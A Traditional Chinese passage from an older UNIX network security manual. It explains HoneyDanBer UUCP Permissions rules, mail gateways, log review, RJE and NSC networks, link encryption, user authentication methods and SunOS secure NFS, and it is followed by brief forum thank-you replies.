(1)HONEYDANBER UUCP與老UUCP的差別
HONEYDANBER UUCP中的/usr/lib/uucp/Systems文件是原來UUCP中的
/usr/lib/uucp/L.sys.HONEYDANBER UUCP中/usr/spool/uucp/.log下的一個
目錄替代了老UUCP的文件/usr/spool/uucp/logFILE./usr/spool/uucp/.log
中的目錄uucico,uucp,uux,uuxqt含有相應指令的記錄文件,各目錄對應最近
處於活躍狀態的遠端系統都有一個記錄文件(記錄文件在這些目錄中通常儲存
一個星期).
如果一個使用本系統的遠端系統未列於Systems文件中,uucico將不允許
該遠端系統執行任何操作,而是啟動shell程序/usr/lib/uucp/remote.unknown,
由UUCP提供的該shell程序的預設版本將在/usr/spool/uucp/.Admin/Foreign
文件中記下遠端系統的登入時間,日期及系統名.只要使remote.unknown不可
執行,就能禁止這一操作,以達到與老UUCP相容.
C.,D.,X.,TM.等文件存放在/usr/spool/uucp下的不同目錄中,目錄名就
是文件對應的遠端系統名.
在HONEYDANBER UUCP中USERFILE與L.cmds文件合併在一起,這個新文件
/usr/lib/uucp/Permissions提供了更靈活的授予外系統存取許可的控制.文
件中的規則表定義了可以發出請示的各種系統.規則與選項的格式如下.
rule=list option=yes|no option=list...
其中rule是登入名或機器名,list是用以分隔各項的規則表(表中各項隨
rule或option而變),option是下邊將討論的各選項之一,或為一個選項表,或
只取yes/no決定允許/不允許一項操作.
(2)登入名規則
LOGNAME規則用於控制作為登入shell啟動的uucico.
LOGNAME=nuucp
指定對所有登入到nuucp戶頭下的系統加預設限制:
. 遠端系統只能傳送文件到/usr/spool/uucppublic目錄中.
. 遠端系統不能請求接收任何文件.
. 當uucico使用遠端系統時,才傳送已排入貯列要傳送到該遠端系統的文
件.這是uucico準確地識別遠端系統的唯一方法(任何系統都可使用本
系統並冒充是xyz系統).
. 由uuxqtux遠端系統的名義可執行的指令是預設規定的指令,這些預設
指令在編譯時定義(通常只有rmail,rnews指令).
. 可用冒號分隔開若干個其它系統的uucico的登入戶頭.
LOGNAME=nuucp:xuucp:yuucp
任何設有LOGNAME規則的系統,若要登入請求UUCP傳送,都會被回絕(系統
將給信息"get lost",並掛起).
一個LOGNAME規則就足夠啟動HONEYDANBER UUCP系統.事實上,當該系統運
行時,將在Permissions文件中放一個無選項的LOGNAME規則,該規則套用於在
/etc/passwd文件入口項shell域中有/usr/lib/uucp/uucico的所有登入戶頭.
可使用若干選項忽略預設限制,這些選項可組合,允許或限制各種操作.例
如可用WRITE選項指定一個或多個送入文件的目錄,而不用被限制送入
/usr/spool/uucppublic目錄.
LOGNAME=nuucp WRITE=/
這一規則允許文件送入本系統的任何目錄.2-4項的限制依然保持.注意:
遠端UUCP請求可重寫任何有寫許可的文件,可指定多個寫入文件的目錄.用冒
號分隔開:
LOGNAME=nnuucp WRITE=/usr:/floppy
該規則允許遠端系統將文件寫到/usr和/floppy目錄中.
用REQUEST=yes選項可允許遠端系統的用戶從本系統拷貝文件.
LOGNAME=nuucp REQUEST=yes
能被拷貝的文件只能是存放在/usr/spool/uucppublic目錄中的文件,1,
3,4,項的限制仍然有效.若要允許遠端系統可從其它目錄拷貝文件,用READ選
LOGNAME=nuucp REQUEST=yes READ=/usr
該規則允許遠端系統拷貝/usr目錄中任何其他人可讀的文件.也可像
WRITE選項一樣指定目錄表.
用SENDFILES=yes選項可允許uucico在遠端系統使用本系統時傳送出已排
隊的文件.
LOGNAME=nuucp SENDFILES=yes
1,2,4項的限制依然有效.
用CALLBACK=yes選項迫使任何登入到指定戶頭的系統call back.
注意:CALLBACK=yes不能與其它選項組合作用.如果其它選項與這條選項
列在一起,其它選項將被忽略.
NOREAD和NOWRITE選項可分別與READ和WRITE選項一起使用.指定NOREAD選
項下的目錄表,可建立對READ選項的例外處理(即指出READ目錄中不能由遠端
系統請求的目錄),例如:
LOGNAME=nuucp,REQUEST=yes READ=/ NOREAD=/etc
該規則允許遠端系統請求系統中任何其他人可讀的文件,但不包括/etc中
的文件,NOWRITE,WRITE的聯合用法與上類似.
一般來說,不要將預設限制改得太多.若本系統被另一系統調去存貯電話
費用或系統管理員沒有辦法撥出,可以用SENDFILE選項.若要對某些機器取消
限制,則應當建立一個僅用於那些機器的uucico登入戶頭.例如:
LOGNAME=nuucp SENDFILES=yes
LOGNAME=trusted SENDFILES=yes REQUEST=yes READ=/ WRITE=/
上面的規則允許在trusted戶頭下登入的系統在本系統中具有另一種文件
存取許可,nuucp戶頭的密碼應送給所有要與本系統uucp建立連接的系統管理
員,trusted戶頭的密碼則只能送給信任系統的管理員.
如系統有信任和非信任的uucp戶頭,最好用PUBDIR選項為這兩種戶頭建立
不同的公共戶頭,PUBDIR允許系統管理員改變uucico對公共目錄的概念(預設
為/usr/spool/uucppublic).例如:
LOGNAME=nuucp SENDFILES=yes REQUEST=yes
PUBDIR=/usr/spool/uucppublic/nuucp
LOGNAME=trusted SENDFILES=yes REQUEST=yes READ=/ WRITE=/
PUBDIR=/usr/spool/uucppublic/trusted
上面的選項使要送到公共目錄中的文件,對於不同登入nuucp和trusted分
別放入不同的目錄中.這將防止登入到nuucp的非信任系統在信任系統的公共
目錄中拷進和拷出文件(注意:上面的選項允許nuucp請求文件傳送).行尾倒斜
槓指明下一行是該行的續行.
用MYNAME選項可以給登入進某一戶頭的系統賦與一個系統名:
LOGNAME=Xuucp MYNAME=IOnker
(3)MACHINE規則
MACHINE規則用於忽略預設限制,在MACHINE規則中指定一個系統名表,就
可使uucico使用這些系統時改變預設限制.READ,WRITE,REQUEST,NOREAD,
NOWRITE,PUBDIR選項的功能與LOGNAME相同.忽略CALLBACK,SENDFILES選項,
MYNAME選項所定義的必須與LOGNAME規則聯用,指定將賦給使用系統的名,該名
僅當使用所定義的系統時才用.
MACHINE規則的格式如下:
MACHINE=zuul:gozur:enigma WRITE=/ READ=/
這條規則使遠端系統zuul,gozar,enigma能夠傳送/請求本系統上任何其
他人可讀/寫的文件.一般不要讓遠端系統在除/usr/spool/uucppublic目錄外
的其它目錄讀寫文件,因此,對於信任的系統也要少用MACHINE規則.
系統名OTHER用於為指定用戶外的所有其他用戶建立MACHINE規則.
COMMANDS選項用於改變uuxqt通過遠端請求執行的預設指令表.
MACHINE=zuul COMMANDS=rmail:rnews:lp
上面的選項允許系統zuul請求遠端執行指令rmail,rnews,lp.uucico不用
這個選項.uuxqt用該選項確定以什麼系統的名義執行什麼指令.
COMMANDS選項所指定的指令將用預設設定的路徑PATH.PATH在編輯uuxqt
時被建立通常設定為/bin:/usr/bin.在COMMANDS選項中給出全路徑名可以忽
略預設PATH.
MACHINE=zuul COMMANDS=umail:/usr/local/bin/rnews:lp
同樣地,對HONEYDANBER UUCP也應當象老UUCP一樣不允許遠端系統執行
uucp或cat這樣的指令.任何能讀寫文件的遠端執行指令都可能威脅局域安全.
雖然局域系統對遠端系統名進行一定程序的校核,但是任何遠端系統在使用局
域系統時都可自稱是"xyz",而局域系統卻完全相信是真的.因此局域系統的系
統可能認為只允許了zuul執行lp指令.但實際上任何自稱是zuul的系統也被允
許執行lp指令.
有兩種方法可以證實系統的身份.一種方法是拒絕用CALLBACK=yes與使用
系統對話.只要電話和網路線未被破密或改變,局域系統就能肯定地驗證遠端
系統的身份.另一種方法是在LOGNAME規則中用VALIDATE選項.
若必須允許某些系統執行"危險"的指令,可聯用COMMANDS和VALIDATE選項,
VALIDATE選項用於LOGNAME規則中指定某系統必須登入到LOGNAME規定的登入
戶頭下:
LOGNAME=trusted VALIDATE=zuul
MACHINE=COMMANDS=rmail:rnews:lp
當一個遠端系統自稱是zuul登入時,uucico將查Permissions文件,找到
LOGNAME=trusted規則中的VALIDATE=zuul,若該遠端系統使用了登入戶頭
trusted,uucico將認為該系統的確是zuul繼續往下執行,否則uucico將認為該
系統是假冒者,拒絕執行其請求.只要唯有zuul有trusted戶頭的登入密碼,其
它系統就不能假冒它.僅當登入密碼是保密的,沒有公佈給其他非信任的系統
管理員或不安全的系統,VALIDATE選項才能奏效.如果信任系統的登入密碼洩
漏了,則任何系統都可偽裝為信任系統.
在COMMANDS選項中給出ALL時,將允許通過遠端請求執行任何指令.因此,
不要使用ALL!規定ALL實際上就是把自己的戶頭給了遠端系統上的每一個用戶.
(4)組合MACHINE和LOGNAME規則
將MACHINE和LOGNAME規則組合在一行中,可以確保一組系統的統一安全,
而不管遠端系統使用局域系統還是局域系統使用遠端系統.
LOGNAME=trusted MACHINE=zuul:gozur VALIDATE=zuul:gozur
REQUEST=yes SENDFILES=yes
READ=/ WRITE=/ PUBDIR=/usr/spool/trusted
COMMANDS=rmail:rnews:lp:daps

(5)uucheck指令
一旦建立了Permissions文件,可用uucheck -v指令瞭解uucp如何解釋該
文件.其輸出的前幾行是驗證HONEYDANBER UUCP使用的所有文件,目錄,指令都
存在,然後是對Permissions文件的檢查.

(6)網關(gateway)
郵件轉送可用於建立一個gateway機器.gateway是一個只轉送郵件給其它
系統的系統.有了gateway,使有許多UNIX系統的部門或公司對其所有用戶只設
一個電子郵件位址.所有發來的郵件都通過gateway轉送到相應的機器.
gateway也可用於加強安全:可將MODEM連線到gateway上,由gateway轉送
郵件的所有系統通過區域網路或有線通訊線與gateway通訊.所有這些局域系統
的電話號碼,uucp登入戶頭,密碼不能對該組局域系統外的系統公佈.如果有必
要,可使gateway是唯一連接了MODEM的系統.
建立一個最簡單的gateway是很容易的:對每個登入進系統,想得到轉送郵
件的用戶,只需在文件/usr/mail/login中放入一行:
Forward to system !login
要傳送給戶頭login的郵件進入gateway後,將轉送給登入在系統system的
戶頭login下的用戶.兩個登入名可以不同.
gateway建立了一個安全管理的關卡:gateway的密碼必須是不可猜測的,
gateway應盡可能只轉送郵送而不做別的事.至少不要將重要資料存放在該機
上.在gateway上還應做日常例行安全檢查,並且要對uucp的登入進行仔細的檢
查.
gateway也為壞傢伙提供了一個入口:如果有人非法進入了gateway,他將
通過uucp使用的通訊線存取其它的局域系統和存取含有關於其它局域系統uucp
信息的Systems文件.若這人企圖非法進入其它系統,這些信息將對他具有很大
的用處.
經驗:
. 若要建立gateway,應確保其盡可能的無懈可擊.
. 可在gateway和局域系統間建立uucp連接,使得局域系統定期的與gateway
通訊獲取郵件,而gateway完全不用使用局域系統.這樣做至少能防止一
個壞傢伙通過gateway非法進入局域系統.
. 利用局域系統的Permissions文件對gateway的行為加以限制,使其裸露
程度達到最小,即只轉發郵件.這樣可使竊密者不能利用gateway獲取其
它系統的文件.

(7)登入文件檢查
HONEYDANBER UUCP自動地將登入信息郵給uucp.login文件,應當定期地讀
這個文件.系統管理員應當檢查那些不成功的大量請求,特別是其它系統對本
系統的文件請求.還要檢查不允許做的遠端指令執行請求.登入信息都儲存在
文件中,如果要檢視,可用grep指令檢視./usr/spool/uucp/.Log/uucico/system
文件中含有uucico登入,/usr/spool/uucp/.Log/uuxqt/system文件含有uuxqt
登入.下面一行指令將列印出uuxqt執行的所有指令(rmail除外):
grep -v rmail /usr/spool/uucp/.Log/uuxqt/*
下面一行指令將列印所有對本系統檔案的遠端請求:
grep -v REMOTE /usr/spool/uucp/.Log/uucico/* | grep "<"
總之,HONEYDANBER UUCP比老UUCP提供了更強的安全性,特別是提高了遠
程指令執行的安全性.
網路安全手冊<三>
4.其它網路

(1)遠端作業登入(RJE)
RJE(remote job entry)系統提供了一組程序及相應的硬體,允許UNIX系
統與IBM主機上的JES(job entry subsystems)通訊.可通過兩條指令的send和
usend存取RJE.send指令是RJE的通用的作業提供程序,它將提供文件給JES,就
好像這些作業文件是從卡片閱讀機讀入的"穿孔卡片"一樣.usend指令用於在
使用了RJE系統的UNIX系統間傳送文件,它將建立一個"作業"(虛擬的一疊穿孔
卡片),並以send指令的送文件的同樣方式將該作業提供給JES.該作業卡片疊
中的控制卡告訴JES資料傳送到何處(這裡,資料是正被傳送的文件).文件傳送
的目的地是UNIX系統,但JES認為是一個"行式列印機".RJE系統通常以每秒
9600位的速率與JES通訊.典型的usend指令句法如下:
usend -d system -u login file(s)
system是掛到IBM JES上的另一個UNIX系統名,login是另一個系統上的接
收用戶的登入名,file(s)是用戶希望傳送的文件.
幾個關於RJE的安全問題:
. 預設時,RJE將把文件傳送到接收用戶的HOME目錄中的rje目錄.該目錄
必須對其他人可寫,可執行,這意味著存入rje目錄的文件易受到檢查,
移動,修改.然而如果該目錄的許可方式是733,其他用戶就不能用ls列
目錄內容尋找感興趣的文件.被建立的文件對所有者,小組或其他人都
是可讀的,所以通過RJE網路傳送的安全文件在系統上都是可讀的.為什
麼這些問題不同於UUCP和/usr/uucppublic目錄?
* UUCP定期地清除/usr/spool/uucppublic目錄的內容,幾天前或幾星
期前的老文件將被刪除,通常用戶將把自己的文件移出uucppublic目
錄,以免文件被刪除,而存在用戶rje目錄中的文件不會被清除,所以
有些用戶從來不把自己的文件移到其它目錄.
* 用戶清楚地知道uucppublic目錄是一個公共目錄,存入重要信息之前,
首先注意將其加密.但是用戶卻總是容易忘記自己rje目錄實際上也
是公共目錄,經常忘記將重要文件加密.
. usend指令在其他人可寫的目錄中建立文件,並重寫其他人可寫的文件.
. RJE服務子程序是執行一些功能而不是執行文件傳送.RJE系統像UUCP一
樣也執行遠端指令,執行RJE的大多數系統用遠端指令執行轉送電子郵
件.因為RJE的傳輸率通常比UUCP更高.遺憾的是RJE沒有像UUCP那樣的
能力限制能執行的指令和能存取的文件.一個好的經驗是將連線到同一
個JES的一組系統,看作這些系統是在同一系統上.

(2)NSC網路系統
NSC(network systems corporation)寬信道網路是一個高速區域網路絡
(LAN).NSC可將數千個最遠相距5000英尺的系統掛在一起,傳輸速率可高達
50MBIT/S,NSC也可通過的通訊如微波或人造衛星通訊線連接不同系統.
UNIX用戶可通過nusend指令存取NSC寬信道,nusend指令的句法與usend命
令相同,除用-c選項傳送其他人不可存取的文件外,大多數情況下,nusend的用
法與usend是一樣的,換言之,如果無-c選項,文件就是可讀的,而且文件路徑名
中列出所有目錄對其他人也都是可搜尋的,前邊討論過的關於RJE的安全問題
的考慮也適合於NSC網路.
可檢視NSC記錄文件,瞭解NSC是否正在執行任何不應執行的指令.記錄文
件儲存在目錄/usr/nsc/log中.下面的指令將列印出所有由NSC在本系統上執
行的指令(rmail除外):
grep execute /usr/nsc/log/LOGFILE|grep -v rmail
5.通訊安全
有兩種方法可以提供安全的通訊:第一種是保證傳輸介質的物理安全,即使
任何人都不可能在傳輸介質上接上自己的竊密線或"竊聽",第二種方法是加密重
要資料.

(1)物理安全
如果所有的系統都鎖在屋裡,並且所有連接系統的網路和接到系統上的終
端都在上鎖的同一屋內,則通訊與系統一樣安全(假定沒有MODEM).但是系統的
通訊線在上鎖的室外時,就會發生問題了.
儘管從網路通訊線提取信息所需要的技術,比從終端通訊線獲取資料的技
術高幾個數量級,上述的同樣的問題也倒發生在網路連接上.
用一種簡單的(但很昂貴)高技術加壓電纜,可以獲得通訊的物理安全.這
一技術是若干年前,為美國國家電話系統而發展的.通訊電纜密封在塑料中,埋
置於地下,並在線的兩端加壓.線上連接了帶有報警器的監示器,用來測量壓力.
如果壓力下降,則意味電纜可能破了,維修人員將被派出尋找與修復出問題的
電纜.
電纜加壓技術提供了安全的通訊線.不是將電纜埋置於地下,而是架線於
整座樓中,每寸電纜都將暴露在外.如果任何人企圖割電纜,監示器會啟動報警
器,通知安全保衛人員電纜已被破壞.如果任何人成功地在電纜上接了自己的
通訊線,安全人員定期地檢查電纜的總長度,應可以發現電纜拼接處.加壓電纜
是遮閉在波紋鋁鋼包皮中的,因此幾乎沒有電磁發射,如果要用電磁感應竊密,
勢必需用大量可見的設備.
這樣終端就不必鎖在辦公室,而只需將安全電纜的端頭鎖在辦公室的一個
盒子裡.
另一個增加外部終端物理安全的方法,是在每天下午5點使用電腦的時
間結束時,即當所有用戶回家時,中斷連線終端的連接.這樣某人若想非法進入系統,
將不得不試突在白天人們來來回回的時間裡獲取終端的存取權,或不得不在下
午5點手試突潛入電腦房(如果5點後電腦房有操作人員或有安全人員,潛
入電腦房的企圖就不可能得逞).
光纖通訊線曾被認為是不可搭線竊聽的,其斷破處立即可被檢測到,拼接
處的傳輸會令人難以忍耐的緩慢.光纖沒有電磁幅射,所以也不能用電磁感應
竊密.不幸的是光纖的最大長度有限制,長於這一長度的光纖系統必須定期地
放大(複製)信號.這就需要將信號轉換成電脈衝,然後再恢復成光脈衝,繼續通
過另一條線傳送.完成這一操作的設備(複製器)是光纖通訊系統的安全薄弱環
節,因為信號可能在這一環節被搭線竊聽.有兩個辦法可解決這一問題:距離大
於最大長度限制的系統間,不要用光纖線通訊(目前,網路覆蓋範圍半徑約100
公里),或加強複製器的安全(用加壓電纜,警報系統,警衛).
(2)加密
加密也可提高終端和網路通訊的物理安全,有三種方法加密傳輸資料:
. 連接加密:在網路節點間加密,在節點間傳輸加密,傳送到節點後解密,
不同節點對間用不同的密碼.
. 節點加密:與連接加密類似,不同的只是當資料在節點間傳送時,不用明
碼格式傳送,而是用特殊的加密硬體進行解密和重加密,這種
專用硬體通常旋轉在安全保險箱中.
. 首尾加密:對進入網路的資料加密,然後待資料從網路傳送出後再進去行
解密.網路本身並不會知道正在傳送的資料是加密資料.這一
方法的優點是,網路上的每個用戶(通常是每個機器的一個用
戶)可有不同的加密關鍵詞,並且網路本身不需增添任何專門
的加密設備.缺點是每個系統必須有一個加密設備和相應的
軟體(管理加密關鍵詞).或者每個系統必須自己完成加密工
作(當資料傳輸率是按兆位/秒的服務機構計算時,加密任務的計
算量是很大的).
終端資料加密是一特殊情況,此時連接加密法和首尾加密法是一樣的方
法,終端和電腦都是既為節點又為終止端點.
通訊資料加密常常不同於文件加密,加密所用的方法不應降低資料的傳送
速度.丟失或被歪曲了的資料不應當引起丟失更多的資料位,即解密工作應當
能修復壞資料,而不能由於壞資料對整個文件或登入進行不正確地解密.對於
登入會話,必須一次加密一個字元,特別是在UNIX系統的情況下,系統要將字所
返回給用戶,更應一次加密一個字元.在網路中,每一鏈可能需要不同的加密關
鍵字,這就提出了對加密關鍵詞的管理,分配和替換問題.
DES傳送資料的一般形式是以代入法密碼格式按塊傳送資料,不能達到上
述的許多要求.DES採用另一加密方法,一次加密一位或一個字元,形成密碼流.
密碼流具有自同步的特點,被傳送的密碼文本中發生的錯誤和資料丟失,將只
影響最終的明碼文本的一小段(64位).這稱為密碼反饋.在這種方法中,DES被
用作虛擬隨機數發生器,產生出一系列用於對明碼文本的隨機數.明碼文本的
每n位與一個DESn位的加密輸出數進行異或,n的取值為1-64,DES加密處理的輸
入是根據前邊傳送的密碼文本形成的64位的數值.
發n為1時,加密方法是自同步方式:錯一位或丟失1位後,64位的密碼文本
將不能被正確地解密,因為不正確的加密值將移入DES輸入的末端.但是一旦接
收到正確的64位密碼,由於DES的加密和解密的輸入是同步的,故解密將繼續正
確地進行.
DES的初始輸入稱為種子,是一個同時由傳輸器和接收器認可的隨機數.通
常種子由一方選項,在加密前給另一方.而加密關鍵詞不能以明碼格式通過網
絡傳送,當加密系統電源時在兩邊都寫入加密關鍵詞,並且在許多階段期間加
密關鍵詞都保持不變,用戶可以選項由主關鍵詞加密的階段關鍵詞,傳送到數
據傳送的另一端,當該階段結束後,階段關鍵詞就不再使用了.主關鍵詞對用戶
是不可見的,由系統管理員定期改變,選項哪一種關鍵詞管理方法,常由所用的
硬體來確定.如果加密硬體都有相應的設備,則用種子還是用主關鍵詞階段關
鍵詞是無關緊要的.
(3)用戶身份鑒別
密碼只是識別一個用戶的一種方法,實際上有許多方法可以用來識別用戶.
. CALL BACK MODEM:則維護系統有效用戶表及其相應電話號碼的設備.當
用戶撥號使用系統時,CALL BACK MODEM獲得用戶的登入戶頭,掛
起,再回頭使用用戶的終端.這種方法的優點是,限制只有電話號
碼存於MODEM中的人才是系統的用戶,從而使非法侵入者不能從其
家裡使用系統並登入,這一方法的缺點是限制了用戶的靈活性,並
仍需要使用密碼,因為MODEM不能僅從用戶發出使用的地方,唯一
地標識用戶.
. 標記識別:標記是密碼的物理實現,許多標記識別系統使用某種形式的
卡(如背面有磁條的信用卡),這種卡含有一個編碼後的隨機數.卡
由連線到終端的閱卡機讀入,不用再敲入密碼.為了增加安全性,
有的系統要求讀入卡和敲入密碼.有些卡的編碼方法使得編碼難
於複製.標記識別的優點是,標識可以是隨機的並且必須長於密碼.
不足之處是每個用戶必須攜帶一個卡(卡也可與公司的徽記組合
使用).並且每個終端上必須連接一個閱讀機.
. 一次性密碼:即"詢問-回應系統".一次性密碼系統允許用戶每次登入時
使用不同的密碼.這種系統允許用戶每次登入時使用不同的密碼.
這種系統使用一種稱做密碼發生器的設備,設備是手攜式的(大約
為一個袖珍計算器的大小),並有一個加密程序和獨一的內部加密
關鍵詞.系統在用戶登入時給用戶提供一個隨機數,用戶將這個隨
機數送入密碼發生器,密碼發生器用用戶的關鍵詞對隨機數加密,
然後用戶再將密碼發生器輸出的加密密碼(回答)送入系統,系統
將用戶輸入的密碼,與它用相同的加密程序,關鍵詞和隨機數產生
的密碼比較,如果二者相同,允許用戶存取系統.這種方法的優點
是:用戶可每次敲入不同的密碼,因此不需要密碼保密,唯有密碼
發生器需要安全保護.為了增加安全性,UNIX系統甚至不需聯機保
存關鍵詞,實際的關鍵詞可儲存在有線連接於系統的一個特殊加
密電腦中.在用戶登入期間,加密電腦將為用戶產生隨機數和
加密密碼.這樣一種系統的優點是,密碼實際不由用戶輸入,系統
中也不儲存關鍵詞,即使是加密格式的關鍵詞也可儲存於系統中.
其不足之處類似於標記識別方法,每個用戶必須攜帶密碼發生器,
如果要離線儲存關鍵詞,還需要有一個特殊硬體.
. 個人特徵:有些識別系統檢測如指印,簽名,聲音,零售圖案這倦的物理
特徵.大多數這樣的系統極是實驗性的,昂貴的,並且不是百分之
百的可靠.任何一個送資料到遠端系統去核實的系統有被搭線竊
聽的危險,非法入侵者只須記錄下送去系統校核的信息,以後再重
顯示這些信息,就能竊密.注意:這同樣也是標記識別系統的一個
問題.
6.SUN OS系統的網路安全
美國SUN MICROSYSTEM公司的SUN OS操作系統是建立在貝爾實驗室的UNIX
SYSTEM V和加州大學伯克得分校的UNIX 4.3基礎上的UNIX操作系統.SUN OS 4.0
版提供了專門的鑒別系統,該系統極大地提高了網路環境的安全性.它也可用來
確保其它UNIX系統或非UNIX系統的安全.它使用DES密碼機構和公共關鍵字密碼
機構來鑒別在網路中的用戶和機器.DES表示資料編碼標準,而公共資料編碼機構
是包含兩種密鑰的密碼系統:一種是公用的,另一種是專用的.公用的密鑰是公開
的而專用密鑰是不公開的.專用(秘密)的密鑰用來對資料進行編碼和解碼.
SUN OS系統不同於其它公共關鍵字編碼之系統在於:SUN OS的公用和專用密
鑰都被用來產生一個通用密鑰,該密鑰又用來產生DES密鑰.

(1)確保NFS的安全
在網路文件系統NFS上建立安全系統,首先文件系統必須開放並保證裝配
的安全.
. 編輯/etc/exports文件,並將-Secure任選項加在要使用DES編碼機構的文
件系統上.在螢幕上顯示伺服器怎樣開放安全的/home目錄,如:
home -Secure,access=engineering
其中engineering是網路中唯一能存取/home文件系統的用戶組.
. 對於每台客戶端機(CLIENT),編輯/etc/fastab文件時,Secure將作為一個裝
配任選項出現在每個需要確保安全的文件系統中.
. SUN OS中包括有/etc/publickey資料庫,該庫對每個用戶均包含有三個域:
用戶的網路名,公用密鑰和編碼後的密鑰.當正常安裝時X唯一的用戶是
nobody,這個用戶可以無需管理員的干預即可建立自己的專用密鑰(使用
chkey(1)).為了進一步確保安全,管理員可為每個使用newkey(8)的用戶
建立一個公用密鑰.
. 驗證keyserv(8c)工作由/etc/rc.local啟動,並且仍在執行.該工作執行
對公用密碼的編碼,並將編碼後的專用密鑰存入/etc/keystore中.
. 此時,所有的用戶(除超級用戶)都必須使用yppasswd來替代passwd,以使
得登入的密碼與用戶的密鑰一致.其結果是在網路中每台客戶端機的
/etc/passwd文件中不能有每個用戶的用戶名,因而應使用有預設值的
/etc/passwd文件.
. 當安裝,移動或昇級某台機器時,要將/etc/keystore和/etc/.rootkey兩
個文件保留.
注意:當你使用login,rlogin或telnet指令到遠端機器時,你會被要求輸
入密碼.一旦你輸入正確的密碼,你也就洩漏了你的帳號.因為此時你的密鑰是
存放在/etc/keystore中.當然這是指用戶對遠端機器的安全不信任時.如果用
戶覺得遠端機器在安全保密方面不可靠,那就不要登入到遠端機器去,而可使
用NFS來裝配你所搜尋的文件

由衷感謝您

好多喔...真是感謝啊..